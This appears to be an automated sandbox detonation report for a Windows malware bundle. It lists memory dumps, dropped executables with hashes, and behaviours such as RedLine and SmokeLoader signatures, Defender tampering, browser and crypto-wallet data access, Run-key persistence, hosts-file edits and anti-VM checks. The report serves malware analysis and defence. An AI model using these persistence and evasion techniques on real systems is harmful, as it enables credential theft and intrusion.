memory/3860-229-0x0000000005830000-0x0000000005831000-memory.dmp
memory/3860-230-0x0000000006250000-0x0000000006251000-memory.dmp
memory/1172-231-0x0000000000AE0000-0x0000000000AE1000-memory.dmp
memory/4508-234-0x0000000004B20000-0x0000000004B21000-memory.dmp
memory/4724-233-0x0000000000000000-mapping.dmp
C:\Users\Admin\Documents\tAYT1FZs4zv8MCsehgIjSWm7.exe
| MD5 | 6aa5e25e5c5fdfa19d40137e738792bd |
| SHA1 | 86f1485825d2f18fc5c03baca37cf5d6755801a8 |
| SHA256 | 504f42eb4afa952ce6178e5e09d9d75274005a1334f1cd965015e147c0d72160 |
| SHA512 | 5e101d4943d002e406495d5111f33b931b5c6db986c244d1fb209965de1e251b84f57683c2699002b41995d6a101d88076a2462404b63f07d584d25726294071 |
memory/3944-239-0x0000000000000000-mapping.dmp
C:\Users\Admin\Documents\tAYT1FZs4zv8MCsehgIjSWm7.exe
| MD5 | 6aa5e25e5c5fdfa19d40137e738792bd |
| SHA1 | 86f1485825d2f18fc5c03baca37cf5d6755801a8 |
| SHA256 | 504f42eb4afa952ce6178e5e09d9d75274005a1334f1cd965015e147c0d72160 |
| SHA512 | 5e101d4943d002e406495d5111f33b931b5c6db986c244d1fb209965de1e251b84f57683c2699002b41995d6a101d88076a2462404b63f07d584d25726294071 |
memory/1172-238-0x0000000005D60000-0x0000000005D61000-memory.dmp
memory/1172-241-0x0000000003030000-0x0000000003031000-memory.dmp
memory/3480-247-0x0000000000000000-mapping.dmp
memory/2368-240-0x0000000002EA0000-0x0000000002ECF000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\BBE3.tmp\BBE4.tmp\extd.exe
| MD5 | b019efc4814c7a73b1413a335be1fa13 |
| SHA1 | 6e093c94cfa4a0fe25e626875f2b06a5cbc622d2 |
| SHA256 | a13ac752c70e4bbd3cd8a58c48d41a7d80946ad2a92780ee26f47100a01e345e |
| SHA512 | d8eae2f4e64ffd4cc3e6398a0e69aa54f7cc98a461d515cb7d8d9606b65c1bb1d70ff1a1cbbb6b84291898fe5d8926b908fdf46ed22ab5d8fc52a6c60bc7120b |
C:\Users\Admin\AppData\Local\Temp\BBE3.tmp\BBE4.tmp\extd.exe
| MD5 | b019efc4814c7a73b1413a335be1fa13 |
| SHA1 | 6e093c94cfa4a0fe25e626875f2b06a5cbc622d2 |
| SHA256 | a13ac752c70e4bbd3cd8a58c48d41a7d80946ad2a92780ee26f47100a01e345e |
| SHA512 | d8eae2f4e64ffd4cc3e6398a0e69aa54f7cc98a461d515cb7d8d9606b65c1bb1d70ff1a1cbbb6b84291898fe5d8926b908fdf46ed22ab5d8fc52a6c60bc7120b |
memory/3860-260-0x00000000058A0000-0x00000000058A1000-memory.dmp
memory/3192-257-0x0000000000AF0000-0x0000000000B06000-memory.dmp
memory/4396-258-0x0000000000000000-mapping.dmp
C:\Users\Admin\Documents\ucKGnlQzLW4NVL8nnw09GARf.exe
| MD5 | 58f5dca577a49a38ea439b3dc7b5f8d6 |
| SHA1 | 175dc7a597935b1afeb8705bd3d7a556649b06cf |
| SHA256 | 857dd46102aea53f0cb7934b96410ebbc3e7988d38dcafdc8c0988f436533b98 |
| SHA512 | 3c75c0cbbbc14bd25b4feb141fd1595ce02469da50432fb48400eb089d6150fe87831ccc775d921eeec697af7aad33a35fadcfd2ec775aeee1ce34355af7338a |
memory/4052-255-0x0000000000000000-mapping.dmp
memory/1172-254-0x0000000005960000-0x0000000005961000-memory.dmp
memory/5068-251-0x0000000000400000-0x0000000000414000-memory.dmp
memory/1172-248-0x0000000005850000-0x0000000005851000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\BBE3.tmp\BBE4.tmp\BBE5.bat
| MD5 | 2460faa09d8ad536c41d21b4f160b628 |
| SHA1 | 9f2b97a2b9697d978d7caa6bc5f043b795c82209 |
| SHA256 | 24421bce80147f7051975a971b46db90abdd47dcd775f5d3e7e5e74c567479a8 |
| SHA512 | 7865f6fc08bd50034cbb8ceb5205f463020002d557956741d230efd1c68615c84e1f2ad5bd2f257469e7a82bdd0311f334d284c792ee0c26151bf361e8aec9a8 |
memory/4508-245-0x0000000004D90000-0x0000000004D91000-memory.dmp
C:\Users\Admin\Documents\ucKGnlQzLW4NVL8nnw09GARf.exe
| MD5 | 58f5dca577a49a38ea439b3dc7b5f8d6 |
| SHA1 | 175dc7a597935b1afeb8705bd3d7a556649b06cf |
| SHA256 | 857dd46102aea53f0cb7934b96410ebbc3e7988d38dcafdc8c0988f436533b98 |
| SHA512 | 3c75c0cbbbc14bd25b4feb141fd1595ce02469da50432fb48400eb089d6150fe87831ccc775d921eeec697af7aad33a35fadcfd2ec775aeee1ce34355af7338a |
memory/5068-244-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
| MD5 | 1c494825e5979add62914cfd05ce1821 |
| SHA1 | b9070a59fc9dfcf6fc9bda98bda26b780e364d3d |
| SHA256 | d5a41fff5b0a0b3a0b02d046be48f3e254ecf9bcb9ba265aad29d57188596768 |
| SHA512 | 750b2ffc1ce7ecb108f2f48aea9581250816360aa94691f758e15af20e518f727dc77ae94b3703752f6657ad9f82ca55e5140518dbcb84c00f29830482762f77 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
| MD5 | 64f1770cf92540240f276ee240d16cf8 |
| SHA1 | 4b797082af3e2116d25ceb758bbc21581f3b8a77 |
| SHA256 | bffc38267bb07fff1549d8382713c3121ed893faae333c4bfd6777ef3d46c860 |
| SHA512 | 174b884ebd31665e9dbcbfb8a1dffa301b17ac18ea8e86ae44f11a16a56a6f77f89109a1b8c965c83f6cd214413bd6650ae9c85380b2b06a78edc22b471815cb |
memory/1548-265-0x0000000004C10000-0x0000000004D16000-memory.dmp
memory/1172-259-0x0000000003530000-0x0000000003531000-memory.dmp
memory/3084-270-0x00000000053C0000-0x00000000053C1000-memory.dmp
memory/3860-273-0x00000000056F0000-0x0000000005C96000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Z2bT94N_CMSE.Exe
| MD5 | 3b4348d187f24c82370836531f3fa94e |
| SHA1 | a2ca4e9f4a8d9c8634e42765e90e252803e20b15 |
| SHA256 | cd189a8c952420bf33b68cce03b41900e8c784b1010213b097ecdb2d7e8079f7 |
| SHA512 | 2bab3c1e38a21cefc06363db75931bf3bfe0b4ee3f089293a750dfc866abc32c7135d2d9ba7ccb005aa01ad02d0a75a5fa02f85ca78cc8fe637615b7fa9e7394 |
C:\Users\Admin\AppData\Local\Temp\is-JTI35.tmp\ucKGnlQzLW4NVL8nnw09GARf.tmp
| MD5 | ffcf263a020aa7794015af0edee5df0b |
| SHA1 | bce1eb5f0efb2c83f416b1782ea07c776666fdab |
| SHA256 | 1d07cfb7104b85fc0dffd761f6848ad176117e146bbb4079fe993efa06b94c64 |
| SHA512 | 49f2b062adfb99c0c7f1012c56f0b52a8850d9f030cc32073b90025b372e4eb373f06a351e9b33264967427b8174c060c8a6110979f0eaf0872f7da6d5e4308a |
memory/4500-268-0x0000000000230000-0x0000000000231000-memory.dmp
C:\Users\Admin\Documents\uRay4026UiM7xMPbYxI6iz8R.exe
| MD5 | 6753c0fadc839415e31b170b5df98fc7 |
| SHA1 | 7adbd92546bc0516013c0f6832ea272cf0606c60 |
| SHA256 | 01550ee84ac5a220197177182fd2f3f9c9e845b416d06a384384e3cd62ecb569 |
| SHA512 | 92c0264046f1293b02ccccbb3cb5b80510d2d3a1d1caff23815adb4c715d0aced08e57682c6dcb76fdca70eb46bc819db2a763f050f74de27fbb3946dca504ab |
memory/3184-266-0x0000000000000000-mapping.dmp
memory/1172-264-0x0000000005740000-0x0000000005741000-memory.dmp
C:\Users\Admin\Documents\uRay4026UiM7xMPbYxI6iz8R.exe
| MD5 | 6753c0fadc839415e31b170b5df98fc7 |
| SHA1 | 7adbd92546bc0516013c0f6832ea272cf0606c60 |
| SHA256 | 01550ee84ac5a220197177182fd2f3f9c9e845b416d06a384384e3cd62ecb569 |
| SHA512 | 92c0264046f1293b02ccccbb3cb5b80510d2d3a1d1caff23815adb4c715d0aced08e57682c6dcb76fdca70eb46bc819db2a763f050f74de27fbb3946dca504ab |
memory/4396-282-0x00000000021A0000-0x00000000021A1000-memory.dmp
memory/4488-289-0x0000027BBC3E0000-0x0000027BBC541000-memory.dmp
C:\Users\Admin\Documents\M7ra4gQ14dQBpMxjqjuHmHYI.exe
| MD5 | ff2d2b1250ae2706f6550893e12a25f8 |
| SHA1 | 5819d925377d38d921f6952add575a6ca19f213b |
| SHA256 | ca46080e121408d9624322e505dc2178ba99e15871c90e101b54e42ea7b54a96 |
| SHA512 | c66544678f3dd49aa1a23cd459a556d923ba44c5d88334a165ea7bd16e4561955536546627b7e83bf1e759428c04b6312e08fdc8c2f6fab69cd29f3b62ce3d23 |
memory/968-288-0x00000000003A0000-0x00000000003A1000-memory.dmp
memory/4488-286-0x0000027BBC190000-0x0000027BBC274000-memory.dmp
memory/4396-281-0x00000000031C0000-0x00000000031FC000-memory.dmp
memory/4396-293-0x0000000005A50000-0x0000000005A51000-memory.dmp
memory/4396-295-0x0000000005A60000-0x0000000005A61000-memory.dmp
memory/972-296-0x0000000000600000-0x0000000000601000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-QD05A.tmp\itdownload.dll
| MD5 | d82a429efd885ca0f324dd92afb6b7b8 |
| SHA1 | 86bbdaa15e6fc5c7779ac69c84e53c43c9eb20ea |
| SHA256 | b258c4d7d2113dee2168ed7e35568c8e03341e24e3eafc7a22a0d62e32122ef3 |
| SHA512 | 5bf0c3b8fa5db63205a263c4fa5337188173248bef609ba4d03508c50db1fd1e336f3041ce96d78cc97659357a83e6e422f5b079d893a20a683270e05f5438df |
C:\Users\Admin\AppData\Local\Temp\is-QD05A.tmp\itdownload.dll
| MD5 | d82a429efd885ca0f324dd92afb6b7b8 |
| SHA1 | 86bbdaa15e6fc5c7779ac69c84e53c43c9eb20ea |
| SHA256 | b258c4d7d2113dee2168ed7e35568c8e03341e24e3eafc7a22a0d62e32122ef3 |
| SHA512 | 5bf0c3b8fa5db63205a263c4fa5337188173248bef609ba4d03508c50db1fd1e336f3041ce96d78cc97659357a83e6e422f5b079d893a20a683270e05f5438df |
memory/1708-284-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\Z2bT94N_CMSE.Exe
| MD5 | 3b4348d187f24c82370836531f3fa94e |
| SHA1 | a2ca4e9f4a8d9c8634e42765e90e252803e20b15 |
| SHA256 | cd189a8c952420bf33b68cce03b41900e8c784b1010213b097ecdb2d7e8079f7 |
| SHA512 | 2bab3c1e38a21cefc06363db75931bf3bfe0b4ee3f089293a750dfc866abc32c7135d2d9ba7ccb005aa01ad02d0a75a5fa02f85ca78cc8fe637615b7fa9e7394 |
memory/2472-278-0x0000000000000000-mapping.dmp
memory/792-277-0x000000001AFF0000-0x000000001AFF2000-memory.dmp
memory/5088-306-0x0000000000000000-mapping.dmp
memory/1784-305-0x0000000000000000-mapping.dmp
memory/4180-298-0x0000000000AA0000-0x0000000000AA1000-memory.dmp
memory/4396-307-0x0000000005A70000-0x0000000005A71000-memory.dmp
memory/4724-302-0x0000000002EE0000-0x0000000002EE9000-memory.dmp
C:\Program Files (x86)\Company\NewProduct\customer3.exe
| MD5 | 1daac0c9a48a79976539b0722f9c3d3b |
| SHA1 | 843218f70a6a7fd676121e447b5b74acb0d87100 |
| SHA256 | e496ce805aa5b3ed8e1898803a536c683d031c5a61b2a54e5c89e02c4febecdf |
| SHA512 | 2259e6e27e6ca6155b50bc0dfd8c3f9f1a31db53c8b4d1811e94e927e30aba2ded4c92a34dfee042d96bd5fd7cbfdbb73d168cc8d66f9b3a37df40980d6dfebc |
C:\Users\Admin\Documents\AhJPwrJS8kuvRpnEJKnRhIHz.exe
| MD5 | 44c355ae8cc3ecc4a95b5716fb9635fd |
| SHA1 | f4d46438cad6fac2be4fb08cf6972a8306e5e12a |
| SHA256 | f77f16151eb30569f7f1276063f67100c6ad439fde9d07605c5ae5e0c9eb8b7d |
| SHA512 | 46ab10861ff330796bd7e60c71e474ebb7a44d2000eea9d56c4fcc27d6b1e1c643996c91d6261f107aa5b86b3bbaf38c23be4705a6fcc3a587bd9d7422c7f259 |
memory/1120-338-0x0000000000000000-mapping.dmp
memory/5112-333-0x00000000006E0000-0x00000000006E3000-memory.dmp
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
| MD5 | ce11de1000560d312bf6ab0b5327e87b |
| SHA1 | 557f3f780cb0f694887ada330a87ba976cdb168f |
| SHA256 | 126daa976d1eaec1bd68eb53748caa325fc537f865051dd0d5f09d599175861a |
| SHA512 | 655b45bcf75a79c174caf6fae84560980511d068f67a89883f70b264e88983f729c604b3484fdcb8d8f8a83105e43d740fe70e7a006806136bc423453d769655 |
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
| MD5 | ce11de1000560d312bf6ab0b5327e87b |
| SHA1 | 557f3f780cb0f694887ada330a87ba976cdb168f |
| SHA256 | 126daa976d1eaec1bd68eb53748caa325fc537f865051dd0d5f09d599175861a |
| SHA512 | 655b45bcf75a79c174caf6fae84560980511d068f67a89883f70b264e88983f729c604b3484fdcb8d8f8a83105e43d740fe70e7a006806136bc423453d769655 |
memory/4396-325-0x0000000005AA0000-0x0000000005AA1000-memory.dmp
memory/4396-320-0x0000000005A90000-0x0000000005A91000-memory.dmp
memory/3708-318-0x0000000000400000-0x0000000000448000-memory.dmp
memory/4396-316-0x0000000005A80000-0x0000000005A81000-memory.dmp
memory/5112-315-0x0000000000000000-mapping.dmp
memory/3708-313-0x0000000000000000-mapping.dmp
C:\Program Files (x86)\Company\NewProduct\customer3.exe
| MD5 | 1daac0c9a48a79976539b0722f9c3d3b |
| SHA1 | 843218f70a6a7fd676121e447b5b74acb0d87100 |
| SHA256 | e496ce805aa5b3ed8e1898803a536c683d031c5a61b2a54e5c89e02c4febecdf |
| SHA512 | 2259e6e27e6ca6155b50bc0dfd8c3f9f1a31db53c8b4d1811e94e927e30aba2ded4c92a34dfee042d96bd5fd7cbfdbb73d168cc8d66f9b3a37df40980d6dfebc |
memory/1172-310-0x00000000057C0000-0x00000000057C1000-memory.dmp
memory/4500-309-0x00000000059A0000-0x00000000059A1000-memory.dmp
memory/972-350-0x0000000003440000-0x0000000003441000-memory.dmp
memory/1788-347-0x0000000000000000-mapping.dmp
memory/4984-343-0x0000000000000000-mapping.dmp
memory/856-342-0x0000000003FD0000-0x000000000406D000-memory.dmp
memory/3672-337-0x0000000000000000-mapping.dmp
memory/1452-336-0x0000000004080000-0x00000000040AF000-memory.dmp
memory/4180-355-0x0000000005690000-0x0000000005691000-memory.dmp
memory/4396-365-0x0000000005AB0000-0x0000000005AB1000-memory.dmp
memory/968-361-0x0000000005A40000-0x0000000005A41000-memory.dmp
memory/3180-370-0x0000000003F90000-0x0000000003FC0000-memory.dmp
memory/1304-367-0x0000000000000000-mapping.dmp
memory/3708-373-0x00000000057A0000-0x0000000005DB8000-memory.dmp
memory/4396-377-0x0000000005AC0000-0x0000000005AC1000-memory.dmp
memory/4368-376-0x0000000000000000-mapping.dmp
memory/4396-395-0x0000000005AE0000-0x0000000005AE1000-memory.dmp
memory/4396-391-0x0000000005AD0000-0x0000000005AD1000-memory.dmp
memory/2104-387-0x0000000000000000-mapping.dmp
memory/1120-386-0x0000000005300000-0x0000000005918000-memory.dmp
memory/4984-384-0x000000001B980000-0x000000001B982000-memory.dmp
memory/1784-400-0x0000022495B20000-0x0000022495B8E000-memory.dmp
memory/5156-399-0x0000000000000000-mapping.dmp
memory/1784-402-0x0000022495B90000-0x0000022495C5F000-memory.dmp
memory/4396-406-0x0000000005AF0000-0x0000000005AF1000-memory.dmp
memory/5276-404-0x0000000000000000-mapping.dmp
memory/4396-410-0x0000000005B00000-0x0000000005B01000-memory.dmp
memory/4396-418-0x0000000005B20000-0x0000000005B21000-memory.dmp
memory/4396-414-0x0000000005B10000-0x0000000005B11000-memory.dmp
memory/5480-424-0x0000000000000000-mapping.dmp
memory/4396-423-0x0000000005B30000-0x0000000005B31000-memory.dmp
memory/4396-428-0x0000000005B50000-0x0000000005B51000-memory.dmp
memory/4396-426-0x0000000005B40000-0x0000000005B41000-memory.dmp
memory/4396-431-0x0000000005B60000-0x0000000005B61000-memory.dmp
memory/5780-439-0x0000000000000000-mapping.dmp
memory/5876-446-0x0000000000000000-mapping.dmp
memory/6052-457-0x0000000000000000-mapping.dmp
memory/5992-454-0x0000000000000000-mapping.dmp
memory/5928-450-0x0000000000000000-mapping.dmp
memory/2104-460-0x0000000004D00000-0x0000000004D01000-memory.dmp
memory/4244-459-0x0000000004920000-0x0000000005246000-memory.dmp
memory/5156-461-0x0000000005010000-0x0000000005011000-memory.dmp
memory/1548-465-0x0000000000000000-mapping.dmp
memory/3508-468-0x0000000000000000-mapping.dmp
memory/5928-485-0x00000000054B0000-0x0000000005AC8000-memory.dmp
memory/2032-484-0x0000000000000000-mapping.dmp
memory/3508-488-0x0000000004490000-0x0000000004491000-memory.dmp
memory/4748-497-0x0000000000000000-mapping.dmp
memory/5528-498-0x0000000000000000-mapping.dmp
memory/2032-506-0x0000000000400000-0x0000000000414000-memory.dmp
memory/5632-504-0x0000000000000000-mapping.dmp
memory/3848-500-0x0000000000000000-mapping.dmp
memory/1548-509-0x0000000004C70000-0x0000000004C71000-memory.dmp
memory/5528-512-0x0000000000400000-0x0000000000414000-memory.dmp
memory/3944-507-0x0000000000000000-mapping.dmp
memory/3944-516-0x00000000021A0000-0x00000000021A1000-memory.dmp
memory/5096-519-0x0000000000000000-mapping.dmp
memory/3344-517-0x0000000000000000-mapping.dmp
memory/3944-520-0x0000000005A50000-0x0000000005A51000-memory.dmp
memory/5748-522-0x0000000000000000-mapping.dmp
memory/3344-526-0x00000000020A0000-0x00000000020A1000-memory.dmp
memory/3944-523-0x0000000005A60000-0x0000000005A61000-memory.dmp
memory/3944-527-0x0000000005A70000-0x0000000005A71000-memory.dmp
memory/3508-531-0x0000000004CF0000-0x0000000004DA7000-memory.dmp
memory/3508-529-0x0000000004B40000-0x0000000004C21000-memory.dmp
memory/6024-530-0x0000000000000000-mapping.dmp
memory/1188-533-0x0000000000400000-0x0000000000414000-memory.dmp
memory/6024-537-0x0000000000400000-0x000000000046D000-memory.dmp
memory/5748-541-0x0000000000400000-0x0000000000414000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2021-08-24 08:16
Reported
2021-08-24 08:46
Platform
win11
Max time kernel
525s
Max time network
1767s
Command Line
Signatures
Modifies Windows Defender Real-time Protection settings
NetSupport
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\rundll32.exe | N/A |
RedLine
RedLine Payload
SmokeLoader
Suspicious use of NtCreateProcessExOtherParentProcess
Checks for common network interception software
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Nirsoft
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\is-KHGQJ.tmp\ultradumnibour.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\SET84A8.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\System32\drivers\SET84A8.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\tap0901.sys | C:\Windows\system32\DrvInst.exe | N/A |
Executes dropped EXE
UPX packed file
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\hoN0r0eWJkmJDk4Ic3MMAGbj.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\68N9UkYMb0rIC3Al6Fz2bfWy.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\JwbLVpobsEhX2A92obT90Pyb.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\1FmfLH5Ur6FIDBTOHluWSgeX.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\1FmfLH5Ur6FIDBTOHluWSgeX.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\qfQuJDWI8e2iMeWnRendOuGg.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\yWQYlqeOPh4GXxK1EXLWj9CZ.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\g8e3AhvD_JzgYVY7B0rwBYJ8.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\qfQuJDWI8e2iMeWnRendOuGg.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\Q75PAMhmUCVu5EYVYjDtmwTV.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\Q75PAMhmUCVu5EYVYjDtmwTV.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\hoN0r0eWJkmJDk4Ic3MMAGbj.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\JwbLVpobsEhX2A92obT90Pyb.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\QvnNIL5ksevghLY9sId6enK4.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\QvnNIL5ksevghLY9sId6enK4.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\g8e3AhvD_JzgYVY7B0rwBYJ8.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\68N9UkYMb0rIC3Al6Fz2bfWy.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\yWQYlqeOPh4GXxK1EXLWj9CZ.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fastsystem2021.exe | C:\Program Files (x86)\Company\NewProduct\customer3.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fastsystem2021.exe | C:\Program Files (x86)\Company\NewProduct\customer3.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
Themida packer
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftEdgeAutoLaunch_5EFC0ECB77A7585FE9DCDD0B2E946A2B = "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --no-startup-window /prefetch:5" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run | C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\ | C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run | C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Cleaner = "C:\\Users\\Admin\\AppData\\Roaming\\Cleaner\\Cleaner.exe --anbfs" | C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" | C:\Users\Admin\AppData\Roaming\7848124.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\GameBox INC\\Faekuxaeshoqy.exe\"" | C:\Users\Admin\AppData\Local\Temp\is-KHGQJ.tmp\ultradumnibour.exe | N/A |
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\Q75PAMhmUCVu5EYVYjDtmwTV.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\68N9UkYMb0rIC3Al6Fz2bfWy.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\JwbLVpobsEhX2A92obT90Pyb.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\yWQYlqeOPh4GXxK1EXLWj9CZ.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\g8e3AhvD_JzgYVY7B0rwBYJ8.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\1FmfLH5Ur6FIDBTOHluWSgeX.exe | N/A |
